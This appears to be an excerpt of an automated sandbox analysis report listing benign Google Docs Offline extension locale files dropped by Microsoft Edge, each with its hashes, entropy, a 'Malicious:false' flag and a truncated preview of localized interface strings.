                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1065
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                                                MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                                                SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                                                SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                                                SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2771
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                                                MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                                                SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                                                SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                                                SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):858
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                                                MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                                                SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                                                SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                                                SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):954
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                                                MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                                                SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                                                SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                                                SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):899
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                                                MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                                                SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                                                SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                                                SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2230
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                                                MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                                                SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                                                SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                                                SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1160
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                                                MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                                                SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                                                SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                                                SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3264
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                                                MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                                                SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                                                SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                                                SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3235
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                                                MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                                                SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                                                SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                                                SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3122
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                                                MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                                                SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                                                SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                                                SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1895
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                                                MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                                                SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                                                SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                                                SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1042
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                                                MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                                                SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                                                SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                                                SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
